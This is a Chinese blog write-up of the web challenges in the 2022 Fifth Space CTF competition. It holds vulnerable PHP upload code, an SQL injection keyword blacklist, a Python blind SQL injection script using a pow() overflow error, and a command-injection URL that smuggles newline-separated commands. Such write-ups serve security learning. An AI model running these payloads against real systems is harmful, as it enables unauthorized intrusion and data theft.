2022第五空间网络安全大赛

最新推荐文章于 2024-11-14 22:03:18 发布
最新推荐文章于 2024-11-14 22:03:18 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: WP 文章标签: web安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/not_code_god/article/details/126943938
版权

Web

5_web_BaliYun

www.zip源码

<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}

class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}

图片flag{sdbvETXct77cKuRWKCw8frYEfXEYhDCa}

5_easylogin

sql注入

图片(1)fuzz过滤 存在用户admin

blacklist

or
|
and
"
#
%20
&
^
updatexml
sleep
rand
like
handler
extractvalue
benchmark
value
regexp
=

whitelist

'
--
/**/
select
%09
%0a

从返回头看到是gbk编码,尝试宽字节注入

img

最后构造虚表登陆

图片(3)

5_web_Eeeeasy_SQL

image

引号被过引号滤了,使用反斜杠逃逸,or可以用 利用pow整型溢出报错,使用(password<0x50)判断原理如下

img

图片(5)

图片(6)

当大于小于都报错的时候就是等于,根据这个原理注入出来password为

图片(7)

同理注入从而盲注出用户名和密码 Flag_Account:G1ve_Y0u_@_K3y_70_937_f14g!!!

脚本

# -*- coding: utf-8 -*-
# @Time : 2022/9/19 17:15
# @Author : pysnow
import requests
import string

url = 'http://39.107.81.36:54028/api/api.php?command=login'
res = ''
tmp = ''
ses = requests.session()
dic = string.ascii_letters + string.digits + '_@!{}'
for i in range(32):
    for j in range(27, 127):
        tmp = hex(j)[2:]
        payload = "or\x09(case\x09when(binary(password)>0x" + res + tmp + ")\x09then\x091\x09else\x09pow(99,9999999)\x09end)#"
        data = {
            "username": 'admin\\',
            "password": payload
        }
        # print(payload)
        r = ses.post(url=url, data=data, allow_redirects=False)
        if 'success' not in r.text:
            res += hex(j - 1)[2:]
            break
    print(res)

这里要用binary转换为2进制比较,直接字符串比较会分不清大小写访问api/flag.php,给了源码读文件过滤了/flag,直接//flag进行绕过图片(8)图片(9)

5_web_letmeguess_1

提示弱口令,admin:admin123

接着命令执行绕过

ls->dir
/->cd ..(也可以使用${}构造斜杠)

http://39.106.155.180:8267/index.php?ip=127.0.0.1%0Acd%09ky*%0Anl%09*
Pysnow
关注
专栏目录
2022第五空间网络安全大赛WriteUp
渗透测试研究中心
09-22 6958
一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码网站源码:index.php:<?phpinclude("class.php");if(isset($_GET['img_name'])){$down=newcheck_img();#hereecho$down->img_check();}if(isset...
2022第五空间-web部分wp+复盘总结
weixin_52599204的博客
09-20 733
这次还是学到不少东西,最后成绩28,web队里师傅们ak了 但是最后那个sql注入我是现在还没看懂,所以就没总结了。收获蛮大的。扩展了不少的思路,get到了大佬平时的思路,rce的那题,读文件的时候,队里师傅写了个一句话木马上去,ban了那么多关键词,我是怎么也想不到怎么写上去的。按我平时的思路就是,利用常见的命令 例如echo命令写马,但ban掉了不少东西, 同时,/也被ban了,进目录是没法搞的。但是大佬的思路是啥,日志写马,日志写马倒也是想到过,可是我/
第五空间CTF初赛WriteUp By EDISEC
qq_45603443的博客
09-26 1617
第五空间CTF初赛WriteUp By EDISEC
2022第五空间WEB&MISC
羽的博客
09-19 2272
CTF
php文件上传类
weixin_38178354的博客
10-11 815
&lt;?php class upload{ protected $fileName; protected $maxSize; protected $allowMime; protected $allowExt; protected $uploadPath; protected $imgFlag; protected $fileInfo; protected $error; p...
2021第五空间网络安全大赛
Huamang的博客
09-17 1276
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
2022第二届网刃杯网络安全大赛 MISC-玩坏的winxp 详细解题过程。
04-25
本文主要讲述了参加2022年第二届网刃杯网络安全大赛MISC类别中“玩坏的winxp”解题的过程,这是一道涉及Windows XP系统、数据恢复、文件隐藏与加密的综合题目。难度系数为4.0,挑战者需要具备一定的网络安全技能,...
2019年江苏省职业技能大赛“网络空间安全赛项”竞赛样题.docx
05-11
2019年江苏省职业技能大赛的“网络空间安全”赛项旨在检验参赛者的网络安全技能,包括系统渗透测试、安全加固、攻防对抗等方面的能力。 在竞赛的第一阶,参赛者需要在单兵模式下进行系统渗透测试与安全加固。具体...
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 858
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
2019年网络空间安全全国职业院校技能大赛训练题一及答案.doc
09-23
网络空间安全全国职业院校技能大赛训练题解析 以下是对给定文件的详细解析: CentOS 5.5 服务器安全配置 1.1 启动 MySQL 服务 在 CentOS 5.5 服务器场景中,使用 Linux 命令行开启 MySQL 服务的命令是:`service...
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3497
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
2022宁波市第五届网络安全大赛密码方向wp
mxx307的博客
05-16 2040
2022宁波市第五届网络安全大赛cryptowp CrackCi4er 题目 n1 = 111762988704157832828352756000615886572414632218718154915195524634082225658480791820347261855532173006898340066914729911294413973225978268352504479418416912217224467214165430937398040953402899080808675144730170
php upload()类,Php文件上传类class.upload.php用法示例
weixin_34096605的博客
04-09 1143
简介:Class.upload.php是用于管理上传文件的php文件上传类,它可以帮助你快速的给自己的网站集成上传文件功能,不仅如此,此分类还有一些列的处理功能,可以对上传的文件或者本地的文件进行处理,其图片处理功能比较 强大,包括图片的缩放、旋转、剪裁、类型转换、应用滤镜、添加边框文字和水印等,支持的图片类型是png、jpg、gif和bmp.使用方法:首先我们要有一个用于提交上传文件的表单,如下...
php-上传文件函数基础使用
Su_Xingyu的博客
04-03 840
转载自http://www.cnblogs.com/luma/p/7461271.html 前台form表单: 请选择上传文件: php处理: php class upload{ // $fileName = $_FILES['myFile']['name']; // $typ
网络安全:守护数字世界的坚固防线
最新发布
fj800j的专栏
11-14 206
首先,加强网络安全法律法规的制定和完善,为网络安全提供有力的法律保障。其次,提高网络安全技术水平,研发更加先进的安全防护产品和解决方案,以应对不断变化的网络威胁。此外,加强网络安全教育和宣传,提高公众的网络安全意识和防范能力,也是至关重要的。因此,加强网络安全防护,构建坚固的数字防线,已成为当务之急。同时,我们也需要加强国际合作,同应对跨国网络犯罪和网络攻击,维护网络空间的和平与安全。让我们携手进,同守护这个数字世界的坚固防线,为构建一个安全、稳定、繁荣的网络空间贡献力量。
网络安全之SQL初步注入
blue_2021010615的博客
11-10 616
{"username":"hahah","password":123456,"time":"6546536435536"}类似于这种就是json串,常见于前后端分离项目,用于不同语言进行调用数据。查询1的时候,会展示username=1的用户数据,可以测试是否有注入点(闭合单引号并构造永真条件。用户输入的数据会被替换到SQL语句中的$name位置。此时应该想到XX型,去闭合括号尝试。利用burpsuilte抓包。闭合引号的同时还需要闭合括号。平台使用pikachu。此处有注入点,为XX型。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 476
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
关于网络安全里蜜罐的详细介绍
2401_88326437的博客
11-14 1098
另一方面,高交互性蜜罐旨在使黑客在蜜罐内花费尽可能多的时间,从而提供有关他们的意图和目标以及他们正在利用的漏洞和所用作案手法的大量信息。将两种类型结合使用,可以通过添加有关高交互蜜罐的意图、通信和漏洞利用的信息来优化有关低交互蜜罐的威胁类型的基本信息。它模仿黑客的目标,利用黑客的入侵企图来获取网络犯罪分子的信息以及他们的行动方式,或者将他们从其他目标上引开。蜜罐的一个定义来自间谍世界,玛塔哈里 (Mata Hari) 式的间谍将恋爱关系用作窃取秘密的方式,被描述为设置“美人计”或“蜜罐”。
网络安全 | 身份授权】一文讲清OAuth
等风来
11-11 117
(第三方应用程序):简称“客户端”(client),指的是需要访问资源的外部应用。(HTTP 服务提供商):简称“服务提供商”,指的是托管用户资源的服务。(资源所有者):简称“用户”,即拥有资源的个体或实体,需要授权客户端访问自己的资源。User Agent(用户代理):指用户用来访问服务的工具,通常指浏览器。(认证服务器):服务提供商专门用于处理认证和授权请求的服务器,负责生成授权凭证和访问令牌。(资源服务器):存放用户资源的服务器,通常和认证服务器同属服务提供商,但可以是不同的服务器。
山东省2018职业技能大赛网络空间安全竞赛实战题目详解
2018年山东省职业技能大赛中职组“网络空间安全”赛项竞赛赛题详细介绍了该赛事针对网络安全专业技能的实战演练,旨在考察参赛者的Web方向技术能力和安全防护能力。竞赛分为两个阶:单兵模式系统渗透测试和分组...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pysnow

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值